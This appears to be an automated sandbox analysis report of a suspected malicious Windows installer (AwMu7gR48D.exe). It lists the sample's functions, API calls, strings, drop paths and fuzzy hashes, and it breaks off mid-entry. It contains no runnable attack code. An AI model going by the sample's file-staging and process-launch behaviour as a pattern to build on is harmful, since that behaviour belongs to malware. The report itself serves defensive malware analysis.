Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 00405960: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nspE492.tmp,?,004059CC,C:\Users\user\AppData\Local\Temp\nspE492.tmp,C:\Users\user\AppData\Local\Temp\nspE492.tmp,76F93410,?,C:\Users\user\AppData\Local\Temp\,00405717,?,76F93410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040596E
Part of subcall function 00405960: CharNextA.USER32(00000000), ref: 00405973
Part of subcall function 00405960: CharNextA.USER32(00000000), ref: 00405987

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D

Part of subcall function 0040551C: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040555F

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\unshabbily\Hardwire,00000000,00000000,000000F0), ref: 0040163C

Strings

C:\Users\user\AppData\Local\unshabbily\Hardwire, xrefs: 00401631

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\unshabbily\Hardwire
API String ID: 1892508949-3099227325
Opcode ID: c3dc61fa4864d68a63a0ff324977f2f4971824b7823c1438af4a242a8e85a59c
Instruction ID: a466de0d3f6f2377f24be2a4188d25ee0cffe6e715a209702fc6e54bc549958f
Opcode Fuzzy Hash: c3dc61fa4864d68a63a0ff324977f2f4971824b7823c1438af4a242a8e85a59c
Instruction Fuzzy Hash: 78112731608151EBCF217FB54C415BF2AB0DA96324B28053FE8D1B22E2D63D4D429A3F

Function 00405E16 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,: Completed,?,?,?,?,00000002,: Completed,?,0040605A,80000002), ref: 00405E5C
RegCloseKey.KERNELBASE(?,?,0040605A,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,?,Completed), ref: 00405E67

Strings

: Completed, xrefs: 00405E19, 00405E4D

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: CloseQueryValue
String ID: : Completed
API String ID: 3356406503-2954849223
Opcode ID: 3949dd6c93d052dc7270a5251cfef74d8147a6dfb4195bf0c528e32bcb56f74b
Instruction ID: 33be00f72f12327029ad1653fb2bc99e6b823e337a66ede3503504709cbc349d
Opcode Fuzzy Hash: 3949dd6c93d052dc7270a5251cfef74d8147a6dfb4195bf0c528e32bcb56f74b
Instruction Fuzzy Hash: 31015A72504209AEDF228F61CC09FEB3BA8EF55364F008426FE59A2190D778DA54CFA4

Function 004055CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421510,Error launching installer), ref: 004055F7
CloseHandle.KERNEL32(?), ref: 00405604

Strings

Error launching installer, xrefs: 004055E1

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 0a67d81f0dbc2c48957f366610cafbe47269508c26dde6c53db592e432081f5d
Instruction ID: f1ce92c91028e46d95f0eda4fe37c0312dcd0371124bcb88e834d1219d8c4f53
Opcode Fuzzy Hash: 0a67d81f0dbc2c48957f366610cafbe47269508c26dde6c53db592e432081f5d
Instruction Fuzzy Hash: 5BE04FF0A00209BFEB009B60EC05F7B7ABCEB00748F404961BD11F31A0E374A9108A79

Function 004069F0 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55cd16da708e23aec6a838b73e901bfe03af6665630861bb5c569519520454bd
Instruction ID: c387c58543e41996c7b199f294dd4e3f2d8ae9e2c90db5b1f56269fb3149e58b
Opcode Fuzzy Hash: 55cd16da708e23aec6a838b73e901bfe03af6665630861bb5c569519520454bd
Instruction Fuzzy Hash: 32A14271E00229CBDF28CFA8C8587ADBBB1FF44305F15806AD856BB281D7785A96DF44

Function 00406BF1 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 320ecdc90cbab0b9bf19e530f323a115307d17d478260d9a41c0a63678b5b88a
Instruction ID: c0a55b7bb8cda596ca91e270a613f9aea3b485865d608933a43e484043593474
Opcode Fuzzy Hash: 320ecdc90cbab0b9bf19e530f323a115307d17d478260d9a41c0a63678b5b88a
Instruction Fuzzy Hash: 45913374D00229CBDF28CF98C8587ADBBB1FF44305F15812AD816BB291C7785996DF48

Function 00406907 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4092221e86ab5222082a79c128cb789b468c9c6112b2c9e1203115320ceab273
Instruction ID: 33bdc002aa07cba8751fe1bb89261eb1bbd9089b315c8d097eab8488b12144ec
Opcode Fuzzy Hash: 4092221e86ab5222082a79c128cb789b468c9c6112b2c9e1203115320ceab273
Instruction Fuzzy Hash: 19814575D04228DFDF24CFA8C8847ADBBB1FB44305F25816AD816BB291C7389A96DF44

Function 0040640C Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9b85a074dbd17559818524a47274955f7f908a271802c30195d609476ec7543
Instruction ID: 368e1e7272001cfb6f2dd5e39cf93d71f7d9f1f25059b380f60c2813f7b9aa4b
Opcode Fuzzy Hash: a9b85a074dbd17559818524a47274955f7f908a271802c30195d609476ec7543
Instruction Fuzzy Hash: 00818735D04228DBDF28CFA8C8447ADBBB1FB44305F21816AD856BB2C1D7785A96DF48

Function 0040685A Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0991df275fe04e69e24ab9d87d2bf1db0f1f681a575424d6ee50318c34d6b
Instruction ID: 563e9c7bfc12ab1e5735381274df4cd9413df1207b4ba467b436c4b8586dcceb
Opcode Fuzzy Hash: 05e0991df275fe04e69e24ab9d87d2bf1db0f1f681a575424d6ee50318c34d6b
Instruction Fuzzy Hash: C9713471D04228DFDF28CFA8C884BADBBB1FB44305F15806AD816B7291D7389996DF58

Function 00406978 Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51e8a78d7989ecdb0a9d35429efa0a8906fb135c8ca24dc2c1ed10a6651990fe
Instruction ID: 7154c5ac750784d404653f653373d782701dde13a8780768b6f209b569f9d9aa
Opcode Fuzzy Hash: 51e8a78d7989ecdb0a9d35429efa0a8906fb135c8ca24dc2c1ed10a6651990fe
Instruction Fuzzy Hash: 61714471D04228DBDF28CFA8C894BADBBB1FB44305F15806AD816BB291C7385996DF48

Function 004068C4 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c27dc6e5a0a86cb3c75e96e92f3c4bfdd7bca547c1c201786b56e13d92a68def
Instruction ID: 6d4e519aaefd354d35621c14bbf49efb9ee6a20a3da98f77445617ba41e869e3
Opcode Fuzzy Hash: c27dc6e5a0a86cb3c75e96e92f3c4bfdd7bca547c1c201786b56e13d92a68def
Instruction Fuzzy Hash: 64715771D04229DBEF28CF98C844BADBBB1FF44305F15806AD816B7291C7389996DF48

Function 00401B5D Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 00401BCC
GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401BDE

Strings

307, xrefs: 00401B84, 00401B8A, 00401BA4

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: Global$AllocFree
String ID: 307
API String ID: 3394109436-3197571367
Opcode ID: d334b10cf0e6116476e410e6ad20a9aceabb79b78abcd267d4b567475e094b3c
Instruction ID: 8e70e66a58bbe0bbdc708fb34704032e6401d8afa79375c0cb6f9cb36bca9441
Opcode Fuzzy Hash: d334b10cf0e6116476e410e6ad20a9aceabb79b78abcd267d4b567475e094b3c
Instruction Fuzzy Hash: 9C2193B6704312ABCB10EBA4DD89A5A77B9DB44314720443BF606B32D1D77CE8118B5E

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3be8b2c82b9d5296ba031bde5fc3ac6967fc1ef6e00b1cb2986e69e81292ed92
Instruction ID: 2eeecbca978bd34a3a2c87f0a48c5f542c226d41099ae67583a71d3d142e8862
Opcode Fuzzy Hash: 3be8b2c82b9d5296ba031bde5fc3ac6967fc1ef6e00b1cb2986e69e81292ed92
Instruction Fuzzy Hash: 80012831724210ABE7294B389D04B6A369CE710328F11823BF811F72F1D6B8DC42DB4D

Function 004062C7 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,0040322E,0000000A), ref: 004062D9
GetProcAddress.KERNEL32(00000000,?), ref: 004062F4

Part of subcall function 00406259: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406270
Part of subcall function 00406259: wsprintfA.USER32 ref: 004062A9
Part of subcall function 00406259: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004062BD

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: a3d13027c8eccd2d0cc6aa0f1dea92ffe2580633c4132c5b9e113a6e73deba4a
Instruction ID: 3d2559cad02f3f2c9522d4b64a0f21e72dff4147d54ae6b068db265a7fe850db
Opcode Fuzzy Hash: a3d13027c8eccd2d0cc6aa0f1dea92ffe2580633c4132c5b9e113a6e73deba4a
Instruction Fuzzy Hash: 10E08C32A08111ABD3217B749D0493B77A89F8470030208BEF90AF2190D738EC61A6AD

Function 00405AC8 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\AwMu7gR48D.exe,80000000,00000003), ref: 00405ACC
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AEE

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 3bf94be8ffed2da7c2b8ff60cd5efa52f63dfdc5f5010c3a9122643b4e997265
Instruction ID: 2f873e3f3c43f12a3908621a4267836d753c9203ad123c8b10a06e7f93ada197
Opcode Fuzzy Hash: 3bf94be8ffed2da7c2b8ff60cd5efa52f63dfdc5f5010c3a9122643b4e997265
Instruction Fuzzy Hash: C7D09E31658201EFEF098F20DD16F2EBBA2EB84B00F10962CB642944E0D6715815AB16

Function 00405AA3 Relevance: 3.0, APIs: 2, Instructions: 13COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(?,?,004056BB,?,?,00000000,0040589E,?,?,?,?), ref: 00405AA8
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405ABC

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 7ab00c422df54d36d0d1c47ad5130eeae7fd73d224c9059dc67d6d60f2aac68c
Instruction ID: bcda01e7c8f131fa4aeedd5c016714751ae51b75e9bd1bf7c5bedf72497e11f2
Opcode Fuzzy Hash: 7ab00c422df54d36d0d1c47ad5130eeae7fd73d224c9059dc67d6d60f2aac68c
Instruction Fuzzy Hash: 23D01276A18125AFC3102728ED0C89BBF65DB54371705CB31FCB9A26F0E7304C529AA5

Function 00405599 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNELBASE(?,00000000,004031AE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 0040559F
GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004055AD

Memory Dump Source

Source File: 00000000.00000002.1496156520.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1496137088.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496179930.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496202031.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1496317000.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_AwMu7gR48D.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 6853200a5fdab59dd982fbc96a9ce2e8b021ac935e945b0af5f1b11de4538164
Instruction ID: 609e72d12c2576d63fea847a2789036c648b4b30b0b2df40a2479a0d359059ce
Opcode Fuzzy Hash: 6853200a5fdab59dd982fbc96a9ce2e8b021ac935e945b0af5f1b11de4538164
Instruction Fuzzy Hash: 80C04C70609502EAEA515B319E08B177A66AB50741F1189356106F41F4D6349551D93F

Function 00405B40 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403170,00000000,00000000,00402FCD,000000FF,00000004,00000000,00000000,00000000), ref: 00405B54

Memory Dump Source

